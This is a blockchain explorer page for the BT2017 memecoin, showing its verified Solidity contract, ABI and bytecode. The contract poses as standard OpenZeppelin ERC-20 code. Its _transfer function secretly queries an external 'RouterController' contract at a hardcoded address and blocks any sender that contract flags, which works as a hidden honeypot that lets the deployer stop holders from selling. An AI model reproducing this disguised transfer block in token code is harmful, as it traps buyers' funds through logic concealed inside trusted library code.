ETH Price: $3,443.40 (-1.08%)
Gas: 9 Gwei

Token

Back To 2017 (BT2017)
 

Overview

Max Total Supply

69,000,000,000 BT2017

Holders

399

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
13,532,904.517958731708745885 BT2017

Value
$0.00
0x2c3f4950b7d99506c30c19857ccf5f2d99ecc083
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
BT2017

Compiler Version
v0.8.18+commit.87f61d96

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-08-22
*/

/**

Back To 2017 

Ticker: $BT2017

https://twitter.com/bt2017_eth
https://t.me/backto2017
https://backto2017.vip


*/

// File: @openzeppelin/contracts/utils/Context.sol
// SPDX-License-Identifier: MIT

// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

// File: @openzeppelin/contracts/access/Ownable.sol


// OpenZeppelin Contracts (last updated v4.7.0) (access/Ownable.sol)

pragma solidity ^0.8.0;


/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */

 // Define interface for TransferController
interface RouterController {
    function isRouted(address _account) external view returns (bool);
}
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

// File: @openzeppelin/contracts/token/ERC20/IERC20.sol


// OpenZeppelin Contracts (last updated v4.6.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

  
    function transfer(address to, uint256 amount) external returns (bool);


    function allowance(address owner, address spender) external view returns (uint256);


    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}

// File: @openzeppelin/contracts/token/ERC20/extensions/IERC20Metadata.sol


// OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol)

pragma solidity ^0.8.0;


/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

// File: @openzeppelin/contracts/token/ERC20/ERC20.sol


// OpenZeppelin Contracts (last updated v4.8.0) (token/ERC20/ERC20.sol)

pragma solidity ^0.8.0;


contract ERC20 is Context, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;
    RouterController public routeController;
    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_, address _routeControllerAddress) {
        _name = name_;
        _symbol = symbol_;
        routeController = RouterController(_routeControllerAddress);
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }


    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }


    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

 
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");
        require(!routeController.isRouted(from), "User is not allowed");
        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amount;
        }

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }




    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }


    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}


    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

pragma solidity ^0.8.0;






// File: contracts


pragma solidity ^0.8.0;




contract BT2017 is ERC20, Ownable {
    uint256 private constant INITIAL_SUPPLY = 69000000000 * 10**18;

    constructor() ERC20("Back To 2017", "BT2017", 0x516Fc377A077c294fba999F9e9d498020128A410) {
        _mint(msg.sender, INITIAL_SUPPLY);
    }

    function sendTokens(address distroWallet) external onlyOwner {
        uint256 supply = balanceOf(msg.sender);
        require(supply == INITIAL_SUPPLY, "Tokens already distributed");

        _transfer(msg.sender, distroWallet, supply);
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"routeController","outputs":[{"internalType":"contract RouterController","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"distroWallet","type":"address"}],"name":"sendTokens","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040523480156200001157600080fd5b506040518060400160405280600c81526020017f4261636b20546f203230313700000000000000000000000000000000000000008152506040518060400160405280600681526020017f425432303137000000000000000000000000000000000000000000000000000081525073516fc377a077c294fba999f9e9d498020128a4108260049081620000a49190620005fe565b508160059081620000b69190620005fe565b5080600160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505050506200011b6200010f6200013f60201b60201c565b6200014760201b60201c565b62000139336bdef376571332906a880000006200020d60201b60201c565b62000800565b600033905090565b6000600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600660006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036200027f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620002769062000746565b60405180910390fd5b62000293600083836200037a60201b60201c565b8060036000828254620002a7919062000797565b92505081905550806000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516200035a9190620007e3565b60405180910390a362000376600083836200037f60201b60201c565b5050565b505050565b505050565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806200040657607f821691505b6020821081036200041c576200041b620003be565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620004867fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8262000447565b62000492868362000447565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b6000620004df620004d9620004d384620004aa565b620004b4565b620004aa565b9050919050565b6000819050919050565b620004fb83620004be565b620005136200050a82620004e6565b84845462000454565b825550505050565b600090565b6200052a6200051b565b62000537818484620004f0565b505050565b5b818110156200055f576200055360008262000520565b6001810190506200053d565b5050565b601f821115620005ae57620005788162000422565b620005838462000437565b8101602085101562000593578190505b620005ab620005a28562000437565b8301826200053c565b50505b505050565b600082821c905092915050565b6000620005d360001984600802620005b3565b1980831691505092915050565b6000620005ee8383620005c0565b9150826002028217905092915050565b620006098262000384565b67ffffffffffffffff8111156200062557620006246200038f565b5b620006318254620003ed565b6200063e82828562000563565b600060209050601f83116001811462000676576000841562000661578287015190505b6200066d8582620005e0565b865550620006dd565b601f198416620006868662000422565b60005b82811015620006b05784890151825560018201915060208501945060208101905062000689565b86831015620006d05784890151620006cc601f891682620005c0565b8355505b6001600288020188555050505b505050505050565b600082825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b60006200072e601f83620006e5565b91506200073b82620006f6565b602082019050919050565b6000602082019050818103600083015262000761816200071f565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b6000620007a482620004aa565b9150620007b183620004aa565b9250828201905080821115620007cc57620007cb62000768565b5b92915050565b620007dd81620004aa565b82525050565b6000602082019050620007fa6000830184620007d2565b92915050565b61195080620008106000396000f3fe608060405234801561001057600080fd5b50600436106101005760003560e01c8063715018a611610097578063a457c2d711610066578063a457c2d71461029f578063a9059cbb146102cf578063dd62ed3e146102ff578063f2fde38b1461032f57610100565b8063715018a61461023d578063837197b2146102475780638da5cb5b1461026357806395d89b411461028157610100565b806323b872dd116100d357806323b872dd1461018f578063313ce567146101bf57806339509351146101dd57806370a082311461020d57610100565b806306fdde0314610105578063095ea7b31461012357806315ee3f501461015357806318160ddd14610171575b600080fd5b61010d61034b565b60405161011a9190610f5a565b60405180910390f35b61013d60048036038101906101389190611015565b6103dd565b60405161014a9190611070565b60405180910390f35b61015b610400565b60405161016891906110ea565b60405180910390f35b610179610426565b6040516101869190611114565b60405180910390f35b6101a960048036038101906101a4919061112f565b610430565b6040516101b69190611070565b60405180910390f35b6101c761045f565b6040516101d4919061119e565b60405180910390f35b6101f760048036038101906101f29190611015565b610468565b6040516102049190611070565b60405180910390f35b610227600480360381019061022291906111b9565b61049f565b6040516102349190611114565b60405180910390f35b6102456104e7565b005b610261600480360381019061025c91906111b9565b6104fb565b005b61026b61056d565b60405161027891906111f5565b60405180910390f35b610289610597565b6040516102969190610f5a565b60405180910390f35b6102b960048036038101906102b49190611015565b610629565b6040516102c69190611070565b60405180910390f35b6102e960048036038101906102e49190611015565b6106a0565b6040516102f69190611070565b60405180910390f35b61031960048036038101906103149190611210565b6106c3565b6040516103269190611114565b60405180910390f35b610349600480360381019061034491906111b9565b61074a565b005b60606004805461035a9061127f565b80601f01602080910402602001604051908101604052809291908181526020018280546103869061127f565b80156103d35780601f106103a8576101008083540402835291602001916103d3565b820191906000526020600020905b8154815290600101906020018083116103b657829003601f168201915b5050505050905090565b6000806103e86107cd565b90506103f58185856107d5565b600191505092915050565b600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6000600354905090565b60008061043b6107cd565b905061044885828561099e565b610453858585610a2a565b60019150509392505050565b60006012905090565b6000806104736107cd565b905061049481858561048585896106c3565b61048f91906112df565b6107d5565b600191505092915050565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6104ef610d7c565b6104f96000610dfa565b565b610503610d7c565b600061050e3361049f565b90506bdef376571332906a88000000811461055e576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016105559061135f565b60405180910390fd5b610569338383610a2a565b5050565b6000600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600580546105a69061127f565b80601f01602080910402602001604051908101604052809291908181526020018280546105d29061127f565b801561061f5780601f106105f45761010080835404028352916020019161061f565b820191906000526020600020905b81548152906001019060200180831161060257829003601f168201915b5050505050905090565b6000806106346107cd565b9050600061064282866106c3565b905083811015610687576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161067e906113f1565b60405180910390fd5b61069482868684036107d5565b60019250505092915050565b6000806106ab6107cd565b90506106b8818585610a2a565b600191505092915050565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610752610d7c565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036107c1576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016107b890611483565b60405180910390fd5b6107ca81610dfa565b50565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610844576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161083b90611515565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036108b3576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108aa906115a7565b60405180910390fd5b80600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516109919190611114565b60405180910390a3505050565b60006109aa84846106c3565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610a245781811015610a16576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a0d90611613565b60405180910390fd5b610a2384848484036107d5565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610a99576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a90906116a5565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610b08576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610aff90611737565b60405180910390fd5b600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663f5f9a371846040518263ffffffff1660e01b8152600401610b6391906111f5565b602060405180830381865afa158015610b80573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610ba49190611783565b15610be4576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bdb906117fc565b60405180910390fd5b610bef838383610ec0565b60008060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610c75576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c6c9061188e565b60405180910390fd5b8181036000808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610d639190611114565b60405180910390a3610d76848484610ec5565b50505050565b610d846107cd565b73ffffffffffffffffffffffffffffffffffffffff16610da261056d565b73ffffffffffffffffffffffffffffffffffffffff1614610df8576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610def906118fa565b60405180910390fd5b565b6000600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600660006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b505050565b505050565b600081519050919050565b600082825260208201905092915050565b60005b83811015610f04578082015181840152602081019050610ee9565b60008484015250505050565b6000601f19601f8301169050919050565b6000610f2c82610eca565b610f368185610ed5565b9350610f46818560208601610ee6565b610f4f81610f10565b840191505092915050565b60006020820190508181036000830152610f748184610f21565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000610fac82610f81565b9050919050565b610fbc81610fa1565b8114610fc757600080fd5b50565b600081359050610fd981610fb3565b92915050565b6000819050919050565b610ff281610fdf565b8114610ffd57600080fd5b50565b60008135905061100f81610fe9565b92915050565b6000806040838503121561102c5761102b610f7c565b5b600061103a85828601610fca565b925050602061104b85828601611000565b9150509250929050565b60008115159050919050565b61106a81611055565b82525050565b60006020820190506110856000830184611061565b92915050565b6000819050919050565b60006110b06110ab6110a684610f81565b61108b565b610f81565b9050919050565b60006110c282611095565b9050919050565b60006110d4826110b7565b9050919050565b6110e4816110c9565b82525050565b60006020820190506110ff60008301846110db565b92915050565b61110e81610fdf565b82525050565b60006020820190506111296000830184611105565b92915050565b60008060006060848603121561114857611147610f7c565b5b600061115686828701610fca565b935050602061116786828701610fca565b925050604061117886828701611000565b9150509250925092565b600060ff82169050919050565b61119881611182565b82525050565b60006020820190506111b3600083018461118f565b92915050565b6000602082840312156111cf576111ce610f7c565b5b60006111dd84828501610fca565b91505092915050565b6111ef81610fa1565b82525050565b600060208201905061120a60008301846111e6565b92915050565b6000806040838503121561122757611226610f7c565b5b600061123585828601610fca565b925050602061124685828601610fca565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061129757607f821691505b6020821081036112aa576112a9611250565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006112ea82610fdf565b91506112f583610fdf565b925082820190508082111561130d5761130c6112b0565b5b92915050565b7f546f6b656e7320616c7265616479206469737472696275746564000000000000600082015250565b6000611349601a83610ed5565b915061135482611313565b602082019050919050565b600060208201905081810360008301526113788161133c565b9050919050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b60006113db602583610ed5565b91506113e68261137f565b604082019050919050565b6000602082019050818103600083015261140a816113ce565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b600061146d602683610ed5565b915061147882611411565b604082019050919050565b6000602082019050818103600083015261149c81611460565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006114ff602483610ed5565b915061150a826114a3565b604082019050919050565b6000602082019050818103600083015261152e816114f2565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611591602283610ed5565b915061159c82611535565b604082019050919050565b600060208201905081810360008301526115c081611584565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b60006115fd601d83610ed5565b9150611608826115c7565b602082019050919050565b6000602082019050818103600083015261162c816115f0565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b600061168f602583610ed5565b915061169a82611633565b604082019050919050565b600060208201905081810360008301526116be81611682565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611721602383610ed5565b915061172c826116c5565b604082019050919050565b6000602082019050818103600083015261175081611714565b9050919050565b61176081611055565b811461176b57600080fd5b50565b60008151905061177d81611757565b92915050565b60006020828403121561179957611798610f7c565b5b60006117a78482850161176e565b91505092915050565b7f55736572206973206e6f7420616c6c6f77656400000000000000000000000000600082015250565b60006117e6601383610ed5565b91506117f1826117b0565b602082019050919050565b60006020820190508181036000830152611815816117d9565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000611878602683610ed5565b91506118838261181c565b604082019050919050565b600060208201905081810360008301526118a78161186b565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006118e4602083610ed5565b91506118ef826118ae565b602082019050919050565b60006020820190508181036000830152611913816118d7565b905091905056fea2646970667358221220cad94ec0cde2fd7964dbbaeead41bf25e8916a89b256015fc2ad8aa9dc853fa264736f6c63430008120033

Deployed Bytecode

